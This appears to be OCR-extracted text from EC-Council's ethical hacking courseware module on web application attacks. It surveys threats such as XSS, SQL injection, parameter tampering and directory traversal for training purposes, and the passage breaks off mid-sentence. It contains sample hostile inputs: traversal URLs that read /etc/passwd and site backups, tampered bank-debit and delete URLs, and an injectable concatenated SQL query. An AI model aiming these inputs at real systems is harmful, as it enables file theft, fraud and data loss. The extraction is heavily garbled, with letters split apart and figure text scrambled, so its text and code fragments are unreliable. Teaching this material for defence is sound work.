25 Ethical Hacking and Countermeasures Hacking Web Applications 0 Server M isconfiguration: The a tta cker exploits th e vu ln e ra b ilitie s in th e w eb servers and trie s to break th e valid a tio n m ethods to get access to th e c o n fid e n tia l data stored on th e servers. 0 W eb service routing issues: The SOAP messages are p e rm itte d to access d iffe re n t nodes on th e In te rn e t by th e W S -R outers. The explo ite d in te rm e d ia te nodes can give access to th e SOAP messages th a t are com m unicated b e tw een tw o endpoints. 0 Cross-site scripting: W h e n e ver any infected JavaScript code is executed, th e n th e ta rg e te d brow sers can be exp lo ite d to g a th e r in fo rm a tio n by th e attacker. Module 13 Page 1747 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

26 Ethical Hacking and Countermeasures Hacking Web Applications C o pyright by E&Coinal.A ll R ights Reserved. Reproduction is S trictly Prohibited. ^ M o d u l e F l o w W eb applicatio ns are ta rg e te d by attackers fo r various reasons. The firs t issue is q u a lity o f th e source code as related to security is p oor and a n o th e r issue is an applica tio n w ith "c o m p le x se tu p." Due to these lo o p h o le s, attackers can easily launch attacks by e x p lo itin g th e m. N ow w e w ill discuss th e th re a ts associated w ith w eb applications. ^ Web App Pen Testing Web App Concepts m Security Tools W eb A p p T hreats J k Countermeasures s e Hacking Methodology 1S> B # Web Application Hacking Tools Module 13 Page 1748 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

27 Ethical Hacking and Countermeasures Hacking Web Applications This section lists and explains th e various w eb applica tio n th re a ts such as p a ra m e te r/fo rm ta m p e rin g, in je ctio n attacks, cross-site scripting attacks, DoS attacks, session fix a tio n attacks, im p ro p e r e rro r handling, etc. Module 13 Page 1749 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

28 Ethical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n T h r e a t s 1 C E H UrtiM Itkml Mstkm In fo r m a tio n L e a ka g e B ro k e n A c c o u n t M a n a g e m e n t C o o k ie P o is o n in g S to ra g e Im p r o p e r E rro r H a n d lin g Cop> ight b y E C -C a u a cil. A ll R ig h ts R e se rve d. R e p ro d u c tio n is S tr ic tly P ro h ib ite d. W e b A p p l i c a t i o n T h r e a t s - 1 W eb applica tio n th re a ts are n o t lim ite d to attacks based on URL and p o rt8 0. Despite using ports, protocols, and th e OSI layer, th e in te g rity o f m ission-critical applicatio ns m ust be p ro te cte d fro m possible fu tu re attacks. V endors w h o w a n t to p ro te c t th e ir pro d u cts' applicatio ns m ust be able to deal w ith all m ethods o f attack. The various types o f w eb applica tio n th re a ts are as fo llo w s: C o o k i e P o i s o n i n g By changing th e in fo rm a tio n inside th e cookie, attackers bypass th e a u th e n tic a tio n process and once th e y gain c o n tro l o ver th e n e tw o rk, th e y can e ith e r m o d ify th e conte n t, use th e system fo r th e m alicious attack, o r steal in fo rm a tio n fro m th e user's system. D i r e c t o r y T r a v e r s a l A ttackers e x p lo it HTTP by using d ire c to ry tra v e rs a l and th e y w ill be able to access re stricte d d ire cto rie s; th e y execute com m ands outside o f th e w eb server's ro o t d ire cto ry. U n v a l i d a t e d I n p u t In o rd e r to bypass th e security system, attackers ta m p e r w ith th e h ttp requests, URL, headers, fo rm fields, hidden fields, q u e ry strings etc. Users' login IDs and o th e r related Module 13 Page 1750 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

29 Ethical Hacking and Counterm easures Hacking Web Applications Exam C ertified Ethical Hacker data gets stored in th e cookies and th is becom es a source o f a tta ck fo r th e in tru d e rs. A ttackers gain access to th e vic tim 's system using th e in fo rm a tio n present in cookies. Examples o f attacks caused by u n v a lid a te d in p u t include SQL in je ctio n, cross-site scripting (XSS), b u ffe r o verflow s, etc. C r o s s - s i t e S c r i p t i n g ( X S S ) " i T f An a tta cke r bypasses th e clie n ts ID security m echanism and gains access p rivileges, and th e n injects m alicious scripts in to th e w eb pages o f a p a rticula r w ebsite. These m alicious scripts can even re w rite th e HTML c o n te n t o f th e w ebsite. I n j e c t i o n F l a w s In jection flaw s are w eb a p p licatio n vu ln e ra b ilitie s th a t a llo w u n tru ste d data to be in te rp re te d and executed as p a rt o f a com m and or query. S Q L I n j e c t i o n This is a type o f attack w h e re SQL com m ands are injected by th e a tta cke r via in p u t data; th e n th e atta cke r can ta m p e r w ith th e data. a P a r a m e t e r / F o r m T a m p e r i n g This typ e o f ta m p e rin g attack is in te n d e d to m a n ip u la tin g th e param eters exchanged b e tw een clie n t and server in o rd e r to m o d ify a p p lica tio n data, such as user cre d e n tia ls and perm issions, price and q u a n tity o f products, etc. This in fo rm a tio n is actually stored in cookies, hidden fo rm fields, o r URL Q uery Strings, and is used to increase a pplicatio n fu n c tio n a lity and c o n tro l. M an in th e m iddle is one o f th e exam ples fo r th is typ e o f attack. A ttackers use to o ls like W eb scarab and Paros p ro xy fo r these attacks. D e n i a l - o f - S e r v i c e ( D o S ) M M ' ' t i A denial-of-se rvice attack is an attacking m e th o d in te n d e d to te rm in a te th e o p e ra tio n s o f a w e b site or a server and m ake it unavailable to in te n d e d users. For instance, a w e b site related to a bank o r em ail service is n o t able to fu n c tio n fo r a fe w hours to a fe w days. This results in loss o f tim e and m oney. B r o k e n A c c e s s C o n t r o l Broken access c o n tro l is a m e th o d used by attackers w h ere a p a rticu la r fla w has been id e n tifie d related to th e access c o n tro l, w h e re a u th e n tic a tio n is bypassed and th e a tta cke r com prom ises th e n e tw o rk. VA /// C r o s s - s i t e R e q u e s t F o r g e r y The cross-site request fo rg e ry m e th o d is a kind o f attack w h ere an a u th e n tica te d user in m ade to p e rfo rm certain tasks on th e w eb applica tio n th a t an attackers chooses. For exam ple, a user clicking on a p a rticu la r link sent th ro u g h an em ail or chat. I n f o r m a t i o n L e a k a g e In fo rm a tio n leakage can cause g re a t losses fo r a com pany. Hence, all sources such as Module 13 Page 1751 Ethical Hacking and Countermeasures C opyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

30 Ethical Hacking and Counterm easures Hacking Web Applications Exam C ertified Ethical Hacker system s or o th e r n e tw o rk resources m ust be p ro te cte d fro m in fo rm a tio n leakage by em ploying p ro p e r c o n te n t filte rin g m echanism s. I m p r o p e r E r r o r H a n d l i n g It is necessary to define how th e system or n e tw o rk should behave w hen an e rro r occurs. O therw ise, it m ay provide a chance fo r th e a tta cke r to break in to th e system. Im p ro p e r e rro r handling m ay lead to DoS attacks. L o g T a m p e r i n g Logs are m a in ta in e d by w eb applicatio ns to tra ck usage patte rn s such as user login credentials, adm in login credentials, etc. A ttackers usually inject, delete, or ta m p e r w ith w eb applicatio n logs so th a t th e y can p e rfo rm m alicious actions or hide th e ir id e n titie s. B u f f e r O v e r f l o w A w eb applica tio n 's b u ffe r o v e rflo w v u ln e ra b ility occurs w hen it fails to guard its b u ffe r p ro p e rly and allow s w ritin g beyond its m axim um size. B r o k e n S e s s i o n M a n a g e m e n t W hen security-sensitive credentials such as passwords and o th e r useful m ate ria l are n o t p ro p e rly taken care, these types o f attacks occur. A ttackers com prom ise th e credentials th ro u g h these security vuln e ra b ilitie s. S e c u r i t y M i s c o n f i g u r a t i o n Developers and n e tw o rk a d m in istra to rs should check th a t th e e n tire stack is configured p ro p e rly or security m isconfig u ra tio n can happen at any level o f an applica tio n stack, including th e p la tfo rm, w eb server, applica tio n server, fra m e w o rk, and custom code. M issing patches, m isconfiguratio ns, use o f d e fa u lt accounts, etc. can be d e tected w ith th e help o f a u to m a te d scanners th a t attackers e x p lo it to com prom ise w eb a pplicatio n security. B r o k e n A c c o u n t M a n a g e m e n t Even a u th e n tic a tio n schem es th a t are valid are w eakened because o f vulnerable account m anagem e nt fu n ctio n s including account update, fo rg o tte n or lost passw ord recovery or reset, passw ord changes, and o th e r sim ila r fu n ctio n s. I n s e c u r e S t o r a g e W eb applicatio ns need to store sensitive in fo rm a tio n such as passwords, c re d it card num bers, account records, o r o th e r a u th e n tic a tio n in fo rm a tio n som ew here; possibly in a database or on a file system. If p ro p e r security is n o t m a in ta in e d fo r these storage locations, th e n th e w eb a p p lica tio n m ay be at risk as attackers can access th e storage and misuse th e in fo rm a tio n stored. Insecure storage o f keys, certifica te s, and passwords a llo w th e a tta cke r to gain access to th e w eb applicatio n as a le g itim a te user. Module 13 Page 1752 Ethical Hacking and Countermeasures C opyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

31 Ethical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n T h r e a t s 2 C E H P la tfo rm E x p lo its In s e c u re In s u ffic ie n t V F a ilu re to D ire c t O b je c t R e fe re n c e s T ra n s p o rt L a y e r P ro te c tio n 1 v R e s tric t URL A ccess In s e c u re C ry p to g ra p h ic S to ra g e O b fu s c a tio n A p p lic a tio n D M Z P ro to c o l A tta c k s S e c u rity M a n a g e m e n t E x p lo its A u th e n tic a tio n H ija c k in g W e b S e rv ic e s A tta c k s U n v a lid a te d R e d ire c ts a n d F o rw a rd s & S e ssio n F ix a tio n A tta c k M a lic io u s File E xecution C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. W e b A p p l i c a t i o n T h r e a t s 2 P l a t f o r m E x p l o i t s Various w eb applicatio ns are b u ilt on by using d iffe re n t p la tfo rm s such as BEA W eb logic and ColdFusion. Each p la tfo rm has various vu ln e ra b ilitie s and exploits associated w ith it. in I n s e c u r e D i r e c t O b j e c t R e f e r e n c e s W hen various in te rn a l im p le m e n ta tio n objects such as file, d ire cto ry, database record, or key are exposed th ro u g h a reference by a developer, th e n th e insecure d ire ct obje ct reference takes place. For exam ple, w h ere a bank account n u m b e r is m ade a p rim a ry key, th e n th e re is a good change it can be com prom ised by th e a tta cke r based on such references. I n s e c u r e C r y p t o g r a p h i c S t o r a g e W hen sensitive data has been stored in th e database, it has to be p ro p e rly encrypted using cryptography. A fe w c ry p to g ra p h ic e n cryptio n m ethods developed by developers are not up to par. C ryptographically very strong e n cryptio n m ethods have to be used. A t th e same tim e, care m ust be taken to store th e cryp to g ra p h ic keys. If these keys are stored in insecure places, th e n th e atta cke r can o b ta in th e m easily and d e cryp t th e sensitive data. Module 13 Page 1753 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

32 Ethical Hacking and Countermeasures Hacking Web Applications A u t h e n t i c a t i o n H i j a c k i n g In o rd e r to id e n tify th e user, every w eb applica tio n uses user id e n tific a tio n such as a user ID and passw ord. Once th e a tta cke r com prom ises th e system, various m alicious things like th e ft o f services, session hijacking, and user im p e rsonatio n can occur. N e t w o r k A c c e s s A t t a c k s fill 11= N e tw o rk access attacks can m a jo rly im pact w eb applications. These can have an e ffe ct on basic level o f services w ith in an applica tio n and can a llo w access th a t standard HTTP applica tio n m e thods w o u ld n o t have access to. C o o k i e S n o o p i n g = A ttackers use cookie snoopin g on a v ictim 's system to analyze th e ir surfing habits and sell th a t in fo rm a tio n to o th e r attackers or m ay use this in fo rm a tio n to launch various attacks on th e v ic tim 's w eb applications. W e b S e r v i c e s A t t a c k s W eb services are process-to-process com m u n ica tio n s th a t have special security issues and needs. An a tta cke r injects a m alicious script in to a w eb service and is able to disclose and m o d ify applica tio n data. - ^ I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n SSL/TLS a u th e n tic a tio n s should be used fo r a u th e n tic a tio n on w ebsites o r th e atta cke r can m o n ito r n e tw o rk tra ffic to steal an a u th e n ticate d user's session cookie. Various th re a ts such as account th e ft, phishing attacks, and adm in accounts m ay happen a fte r system s are being com prom ised. r H i d d e n M a n i p u l a t i o n I These types o f attacks are m o stly used by attackers to com prom ise e-com m erce w ebsites. A ttackers m a n ip u la te th e h id d e n fie ld s and change th e data stored in th e m. Several onlin e stores face th is typ e o f p roblem every day. A ttackers can a lte r prices and conclude tra n sactions w ith th e prices o f th e ir choice. D M Z P r o t o c o l A t t a c k s The DMZ (D em ilitarized Zone) is a se m i-tru ste d n e tw o rk zone th a t separates the u n tru ste d In te rn e t fro m th e com pany's tru s te d in te rn a l n e tw o rk. An a tta cke r w h o is able to com prom ise a system th a t allow s o th e r DMZ p rotocols has access to o th e r DMZs and in te rn a l system s. This level o f access can lead to : C om prom ise o f th e w eb applicatio n and data Q D efacem ent o f w ebsites Access to in te rn a l system s, in clu d in g databases, backups, and source code Module 13 Page 1754 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

33 Ethical Hacking and Countermeasures Hacking Web Applications U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s A ttackers m ake a victim click an unvalidated link th a t appears to be a valid site. Such redirects m ay a tte m p t to install m alw are o r tric k vic tim s in to disclosing passwords or o th e r sensitive in fo rm a tio n. Unsafe fo rw a rd s m ay a llo w access c o n tro l bypass leading to: 0 Session fix a tio n attacks S ecurity m anagem e nt exploits 0 Failure to re s tric t URL access e M alicious file execution F a i l u r e t o R e s t r i c t U R L A c c e s s An app ication o fte n safeguards o r p ro te c ts sensitive fu n c tio n a lity and prevents the displays o f links or URLs fo r p ro te c tio n. A ttackers access those links o r URLs d ire c tly and p e rfo rm ille g itim a te operations. O b f u s c a t i o n A p p l i c a t i o n A ttackers usually w o rk hard at hiding th e ir attacks and to avoid d e te ctio n. N e tw o rk and host in tru sio n d e te ctio n system s (IDSs) are consta n tly looking fo r signs o f w e llknow n attacks, d rivin g attackers to seek d iffe re n t ways to rem ain u n d e te cte d. The m ost com m on m e th o d o f a tta ck obfuscatio n involves encoding p o rtio n s o f th e a tta ck w ith Unicode, UTF-8, or URL encoding. Unicode is a m e th o d o f repre se n tin g letters, num bers, and special characters so these characters can be displayed p roperly, regardless o f th e a p p licatio n or u n d erlying p la tfo rm in w hich th e y are used. S e c u r i t y M a n a g e m e n t E x p l o i t s Some attackers ta rg e t se cu rity m anagem ent systems, e ith e r on netw o rks or on th e a p p licatio n layer, in o rd e r to m o d ify o r disable security e n fo rcem e n t. An atta cker w ho exploits security m anagem e nt can d ire c tly m o d ify p ro te c tio n policies, d e lete existing policies, add new policies, and m o d ify a p p lica tio n s, system data, and resources. L * S e s s i o n F i x a t i o n A t t a c k In a session fix a tio n attack, th e a tta c k e r tricks o r a ttra c ts th e user to access a le g itim a te w eb server using an e xp licit session ID value. M a l i c i o u s F i l e E x e c u t i o n M alicious file execution vu ln e ra b ilitie s had been fo u n d on m ost applications. The cause o f this v u ln e ra b ility is because o f unchecked in p u t in to th e w eb server. Due to th is unchecked in p u t, th e files o f attackers are easily executed and processed on th e w eb server. In a d d itio n, th e a tta cke r p e rfo rm s re m o te code e xecutio n, installs th e ro o tk it re m o te ly, and in at least som e cases, takes co m p le te c o n tro l over th e systems. Module 13 Page 1755 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

34 Ethical Hacking and Countermeasures Hacking Web Applications U n v a l i d a t e d I n p u t C E H In p u t va lid a tion fla w s refers to a w eb application vu ln e ra b ility w h e re in p u t fro m a c lie n t is n o t va lid a te d befo re being processed by w eb applications and backend servers An attacker exploits in p u t va lid a tion fla w s to p e rfo rm cross-site scripting, b u ffe r overflo w, inje ctio n attacks, etc. th a t re sult in data th e ft and system m alfunctioning Boy.com D a ta b a s e Browser input not validated by the w eb : application h t t p : / / j u g g y b o y. c o m / l o g i n. a s p x? u s e r = j a s o n s 0 p a s s = s p r x n g f i e l d Browser Post Request s t r i n g s q l,,s e l e c t * from U se r s w here י יי + t + U se r. T e x " י = r u s e and י= pwd + P a s s w o r d.t e x t +! «r M o d ifie d Q u e ry C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. U n v a l i d a t e d I n p u t An in p u t v a lid a tio n fla w refers to a w eb a pplicatio n v u ln e ra b ility w h e re in p u t fro m a clie n t is n o t va lid a te d before being processed by w eb applications and backend servers. Sites try to p ro te c t them selves fro m m alicious attacks th ro u g h in p u t filtra tio n, b u t th e re are various m ethods prevailing fo r th e th e purpose o f encoding. M any h ttp inputs have m u ltip le fo rm a ts th a t m ake filte rin g very d iffic u lt. The canonicalization m e th o d is used to sim p lify th e encodings and is useful in avoiding various vuln e ra b le attacks. W eb applicatio ns use only a client-side m echanism in in p u t va lid a tio n and attackers can easily bypass it. In o rd e r to bypass th e security system, attackers ta m p e r th e h ttp requests, URLs, headers, fo rm fields, hidden fields, and query strings. Users login IDs and o th e r related data gets stored in th e cookies and th is becom es a source o f a tta ck fo r in tru d e rs. A ttackers gain access to th e system s by using th e in fo rm a tio n present in th e cookies. Various m ethods used by hackers are SQL in je ctio n, cross-site scripting (XSS), b u ffe r o verflo w s, fo rm a t strin g attacks, SQL in je ctio n, cookie poisoning, and hidden fie ld m a n ip u la tio n th a t result in data th e ft and system m a lfu n ctio n in g. Module 13 Page 1756 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

35 Ethical Hacking and Countermeasures Hacking Web Applications D a ta b a s e : B row ser in p u t not : validated by th e w e b : application h t t p : / / ju g g y b o y. c o m / l o g i n. a s p x? u s e r = j a s o n p a s s = s p r i n g f ie l d B ro w s e r Post R eq u e st Wtmmrnmr* w here s t r i n g s q l,,s e l e c t * from U se r s u s e r = ' + ' + t U s e r.t e x an d pw d=1 + P a s s w o r d.t e x t + " ' "r M o d ifie d Q u e ry F ig u re : U n v a lid a te d In p u t Module 13 Page 1757 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

36 Ethical Hacking and Countermeasures Hacking Web Applications ו P a r a m e t e r / F o r m T a m p e r i n g C E H Urtifwd tlfcxjl luthm J A web param eter tam pering attack involves the m anipulation o f param eters exchanged between client and server in o rd e r to m o d ify application data such as user credentials and perm issions, price, and q u a n tity o f products J A p aram eter ta m p e rin g attack e x p lo its v u ln e ra b ilitie s in in te g rity and logic validation m echanism s th a t m ay re sult in XSS, SQL inje ctio n, etc. 0 (D 1 htp:/ w.jugybank.com/cust.asp?profile=21&debit=250<...j T a m p e rin g w ith th e URL p a ra m e te rs 1 1 htp:/ w.jugybank.com/cust.asp?profile=82&debt=lso<...j <... 0 O th e r p a ra m e te rs ca n b e ch a n g e d in c lu d in g a ttr ib u te p a ra m e te rs stat.asp?pg-147&status / delete < C o pyright by E&Coinal. A ll R ights Reserved. Reproduction is S trictly Prohibited. ייי ח r- P a r a m e t e r / F o r m T a m p e r i n g P aram eter ta m p e rin g is a sim ple fo rm o f a tta ck aim ed d ire ctly at th e a p p licatio n 's business logic. This attack takes advantage o f th e fa ct th a t m any program m ers rely on hidden or fixed fields (such as a hidden tag in a fo rm o r a p a ra m e te r in an URL) as th e o nly security m easure fo r certain o perations. To bypass th is security m echanism, an atta cker can change these p a ram eters. D e tailed D e scrip tio n Serving th e requested files is th e m ain fu n c tio n o f w eb servers. During a w eb session, param eters are exchanged betw een th e w eb b ro w ser and th e w eb a p p licatio n in o rd e r to m aintain in fo rm a tio n a b o u t th e clie n t's session, w hich e lim inates th e need to m a in ta in a com plex database on th e server side. URL queries, fo rm fields, and cookies are used to pass th e param eters. Changed param eters in th e fo rm fie ld are th e best exam ple o f p a ra m e te r ta m p e rin g. W hen a user selects an HTML page, it is stored as a fo rm fie ld value, and tra n sfe rre d as an HTTP page to th e w eb applicatio n. These values m ay be pre-selected (com bo box, check box, radio butto n s, etc.), fre e te xt, or hidden. An a tta cke r can m a n ip u la te these values. In som e e xtrem e cases, it is ju s t like saving th e page, e d itin g th e HTML, and reloading th e page in th e w eb brow ser. Module 13 Page 1758 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

37 Ethical Hacking and Countermeasures Hacking Web Applications H idden fields th a t are invisible to th e end user provide in fo rm a tio n status to th e w eb a p p licatio n. For exam ple, consider a p ro d u ct o rd e r fo rm th a t includes th e hidden fie ld as fo llo w s: < in p u t ty p e = " h id d e n " n a m e = "p ric e " v a lu e = " "> Com bo boxes, check boxes, and radio b u tto n s are exam ples o f pre-selected param eters used to tra n s fe r in fo rm a tio n b e tw een d iffe re n t pages, w h ile a llo w in g th e user to select one o f several p redefined values. In a p a ra m e te r ta m p e rin g attack, an a tta cker m ay m a n ip u la te these values. For exam ple, consider a fo rm th a t includes th e com bo box as fo llo w s: <FORM METHOD=POST A C T IO N = "xfe rm o n e y. a s p > S ource A c c o u n t: <SELECT NAM E="SrcAcc"> <OPTION VALUE=" "> * * * * * * 7 8 9</OPTION> <OPTION V A L U E = " "> ******8 6 8 < /O P T IO N X /S E L E C T > <BR>Am ount: <INPUT NAME="Amount" SIZE=20> < B R > D e s tin a tio n A c c o u n t: <INPUT NAM E="DestAcc" SIZE=40> <BR XIN PU T TYPE=SUBMIT> <INPUT TYPE=RESET> </FORM> Bypassing An a tta cker m ay bypass th e need to choose b e tw een tw o accounts by adding a n o th e r account in to th e HTML page source code. The new com bo box is displayed in th e w eb b ro w ser and th e a tta cke r can choose th e new account. HTML fo rm s su b m it th e ir results using one o f tw o m ethods: GET or POST. In th e GET m e thod, all fo rm param eters and th e ir values appear in th e query string o f th e next URL, w hich th e user sees. An atta cke r m ay ta m p e r w ith this query string. For exam ple, consider a w eb page th a t allow s an a u th e n ticate d user to select one o f his or her accounts fro m a com bo box and d e b it th e account w ith a fixed u n it a m ount. W hen th e su b m it b u tto n is pressed in th e w eb brow ser, th e URL is requested as fo llo w s: h ttp ://w w w.iu g g v b a n k.c o m /c u s t.a s p? p ro file = 2 1 & d e b it= An a tta cke r m ay change th e URL param eters (p ro file and d e b it) in o rd e r to d e b it a n o th e r account: h ttp ://w w w.iu g g y b a n k.c o m /c u s t.a s p? p ro file = 8 2 & d e b it= There are o th e r URL param eters th a t an atta cker can m o d ify, including a ttrib u te param eters and in te rn a l m odules. A ttrib u te param eters are unique param eters th a t characterize th e b ehavio r o f th e uploading page. For exam ple, consider a co n te n t-sh a rin g w eb applica tio n th a t enables th e c o n te n t cre a to r to m o d ify c o n te n t, w h ile o th e r users can o nly vie w th e co n te n t. The w eb server checks w h e th e r th e user w h o is accessing an e n try is th e a u th o r o r n o t (usually by cookie). An o rd in a ry user w ill request th e fo llo w in g link: h ttp ://w w w.iu g g y b a n k.c o m /s ta t.a s p? p g = & s ta tu s = v ie w Module 13 Page 1759 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

38 Ethical Hacking and Countermeasures Hacking Web Applications An a tta cke r can m o d ify th e status p a ra m e te r to d e le te in o rd e r to d e le te perm ission fo r th e c o n te n t. h ttp ://w w w.iu g g y b a n k.c o m /s ta t.a s p? p g = & s ta tu s = d e le te P a ra m e te r/fo rm ta m p e rin g can lead to th e ft o f services, escalation o f access, session hijacking, and assum ing th e id e n tity o f o th e r users as w ell as param eters a llo w in g access to d e veloper and debugging in fo rm a tio n. [GO asp?profile=21&debit=2500 htp:/ w.jugybank. com/cust. asp?profile=82&debit=150 ר T a m p e r in g w it h t h e U R L p a r a m e te r s GO h ttp ://w w w.juggybank.com /stat. asp?pg=531&status=view < O t h e r p a r a m e te r s c a n b e c h a n g e d in c lu d in g a t t r ib u t e p a r a m e te r s Q O ך http ://w ww.juggybank.com /stat.asp?pg=147& status=delete FIGURE 13.6: Form Tampering Module 13 Page 1760 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

39 Ethical Hacking and Countermeasures Hacking Web Applications D i r e c t o r y T r a v e r s a l C E H C«rt1fW4 itkiul Nm Im C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. v D i r e c t o r y T r a v e r s a l W hen access is provided outside a defin e d applica tio n, th e re exists th e p o ssib ility o f u n in te n d e d in fo rm a tio n disclosure or m o d ific a tio n. C om plex a p p lic a tio n s exist as applica tio n com ponents and data, w hich are typ ic a lly configured in m u ltip le d irectories. An applica tio n has th e a b ility to traverse these m u ltip le dire cto rie s to locate and execute th e le g itim a te p o rtio n s o f an applica tio n. A d ire c to ry tra v e rs a l/fo rc e fu l brow sing attack occurs w hen th e a tta cke r is able to brow se fo r d ire cto rie s and files outside th e norm al applica tio n access. A D irectory T raversal/f orceful Brow sing a tta ck exposes th e d ire c to ry s tru c tu re o f an a p p licatio n, and o fte n th e underlyin g w eb server and o p e ra tin g system. W ith th is level o f access to th e w eb applica tio n a rch ite ctu re, an a tta cke r can: E num erate th e conte n ts o f files and dire cto rie s Access pages th a t o th e rw ise re q u ire a u th e n tic a tio n (and possibly paym ent) Gain secret know ledge o f th e applica tio n and its co n stru ctio n Discover user IDs and passwords buried in hidden files Locate source code and o th e r in te re stin g files le ft on th e server V iew sensitive data, such as custo m e r in fo rm a tio n Module 13 Page 1761 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

40 Ethical Hacking and Countermeasures Hacking Web Applications The fo llo w in g exam ple uses backup o f th e w eb applica tio n : to backup several d ire cto rie s and o b ta in a file co n ta in in g a h ttp ://w w w.ta rg e ts ite.c o m /../../../s ite b a c k u p.z ip This exam ple obtains th e "/e tc /p a s s w d " file fro m a U N IX/Linux system, w hich contains user account in fo rm a tio n : h ttp ://w w w.ta rg e ts ite.c o m /../../../../e tc /p a s s w d Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal: h ttp ://w w w.iu g g y b o v.c o m /p ro c e s s.a s p x =. J. / s o m e d ir/s o m e file h ttp ://w w w.iu g g y b o y.c o m /.././../../s o m e d ir/s o m e file The pictorial representation o f d ire c to ry traversal attack is show n as fo llo w s: /../../ /etc/passw d > c <?php $ theme 'Jaoon.php', ) ) יי * 1 J s A tt a c k e r password files r o o t:a 9 8 b 2 4 a I d 3 e 8 :0 : l: S y s t e m O p e r a t o r : / : /b in /k s h d a e m o n : * : l: l: : / t m p : J a s o n : a 3 b a 7 6 f7 6 d 5 7.: : : D e v e lo p e r : / h o m e / u s e r s / J a s o n / :/ b in / c s h V u ln e r a b le S e rv e r C o d e FIGURE : D ire c to r y T ra v e rs a l Module 13 Page 1762 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

41 Ethical Hacking and Countermeasures Hacking Web Applications S e c u r i t y M i s c o n f i g u r a t i o n C E H Easy Exploitation Using m isconfiguration vulnerabilities, attackers gain unauthorized accesses to default accounts, read unused pages, exploit unpatched flaws, and read o r w rite unprotected files and directories, etc. Common Prevalence Security misconfiguration can occur at any level o f an application stack, including the platform, web server, application server, fram ew ork, and custom code Example e The application server admin console is automatically installed and not removed Default accounts are not changed Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. M S e c u r i t y M i s c o n f i g u r a t i o n ' " Developers and n e tw o rk a d m in is tra to rs should check th a t th e e n tire stack is configured p ro p e rly or security m isconfig u ra tio n can happen at any level o f an a pplicatio n stack, including th e p la tfo rm, w eb server, applica tio n server, fra m e w o rk, and custom code. For instance, if th e server is n o t configured p roperly, th e n it results in various problem s th a t can in fe ct th e security o f a w ebsite. The problem s th a t lead to such instances include server s o ftw a re flaw s, unpatched security flaw s, enabling unnecessary services, and im p ro p e r a u th e n tic a tio n. A fe w o f these problem s can be d e te cte d easily w ith th e help o f a u to m a te d scanners. A ttackers can access d e fa u lt accounts, unused pages, unpatched flaw s, u n p ro te cte d files and d irectories, etc. to gain u n a u th o riz e d access. All th e unnecessary and unsafe fe a tures have to be taken care o f and it proves very beneficial if th e y are com p le te ly disabled so th a t the outsiders d o n 't m ake use o f th e m fo r m alicious attacks. All th e applicatio n-based files have to be taken care o f th ro u g h p ro p e r a u th e n tic a tio n and strong se cu rity m ethods o r crucial in fo rm a tio n can be leaked to th e attackers. Examples o f unnecessary fe a tures th a t should be disable or changed include: Q The applica tio n server adm in console is a u to m a tica lly installed and n o t rem oved D efault accounts are n o t changed Module 13 Page 1763 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

42 Ethical Hacking and Countermeasures Hacking Web Applications 6 A tta cke r discovers th e standard adm in pages on server, logs in w ith d e fa u lt passwords, and takes over Module 13 Page 1764 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

43 Ethical Hacking and Countermeasures Hacking Web Applications I n j e c t i o n F l a w s C E H Injection flaws are web application vulnerabilities th a t allow untrusted data to be interpreted and executed as part o f a command o r query Attackers exploit injection flaw s by constructing m alicious com m ands or queries th a t result in data loss or corruption, lack o f accountability, or denial o f access Injection flaws are prevalent in legacy code, o fte n found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers SQL Injection Command Injection LDAP Injection It involves the injection o f m alicious SQL queries into user input form s It involves th e injection o f m alicious code through a web application It involves th e injection o f m alicious LDAP statem ents SQL Server J J C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. I n j e c t i o n F l a w s In jection flaw s are th e loopholes in th e w eb applica tio n th a t a llo w unreliable data to be in te rp re te d and executed as p a rt o f a com m and or query. The in je ctio n flaw s are being e xplo ite d by th e a tta cke r by co n stru ctin g m alicious com m ands o r queries th a t result in loss o f data or c o rru p tio n, lack o f a ccounta b ility, o r denial o f access. In je ctio n flaw s are p re vale n t in legacy code, o fte n fo u n d in SQL, LDAP, and XPath queries, etc. These flaw s can be d e tected easily by applica tio n v u ln e ra b ility scanners and fuzzers. By e xplo itin g th e flaw s in th e w eb applica tio n, th e a tta cke r can easily read, w rite, 